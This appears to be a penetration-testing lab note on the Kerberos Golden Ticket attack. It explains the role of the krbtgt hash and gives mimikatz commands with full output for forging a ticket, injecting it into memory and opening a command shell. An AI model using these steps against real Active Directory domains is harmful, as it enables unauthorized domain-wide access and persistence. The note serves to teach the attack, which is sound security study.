When a user requests a Ticket Granting Ticket (TGT) from the Key Distribution Center (KDC), the KDC encrypts the TGT with a secret only known to the KDC. **The secret is actually the password hash to the user: **krbtgt.
**If we get our hands on the**** krbtgtpassword hash we can create our own self made TGT tickets, know as **a Golden Tickets.
Golden Ticket vs Silver Ticket
Silver Tickets aim to forge a TGS ticket to access a specific service, Golden Tickets are a much more powerful attack vector that gives us access to the entire domain.
NOTE: We must carefully protect stolen krbtgt password hashes because they grant unlimited domain access.
Prerequisites
For a successful attack we need the following:
Access to Domain Admin account or compromised Domain Controller.
Attack
Attempting to laterally move
We will try to laterally move with our current ticket. We are denied access.
Next we can create the Golden Ticket & Inject it into memory
mimikatz # kerberos::purge
Ticket(s) purge for current session is OK
mimikatz # kerberos::golden /user:jen /domain:corp.com /sid:S-1-5-21-1987370270-658905905-1781884369 /krbtgt:1693c6cefafffc7af11ef34d1c788f47 /ptt
User : jen
Domain : corp.com (CORP)
SID : S-1-5-21-1987370270-658905905-1781884369
User Id : 500
Groups Id : *513 512 520 518 519
ServiceKey: 1693c6cefafffc7af11ef34d1c788f47 - rc4_hmac_nt
Lifetime : 9/16/2022 2:15:57 AM ; 9/13/2032 2:15:57 AM ; 9/13/2032 2:15:57 AM
-> Ticket : ** Pass The Ticket **
* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated
Golden ticket for 'jen @ corp.com' successfully submitted for current session
mimikatz # misc::cmd
Patch OK for 'cmd.exe' from 'DisableCMD' to 'KiwiAndCMD' @ 00007FF665F1B800
Verifying Success
We can try to laterally move now and verify we have successfully completed the attack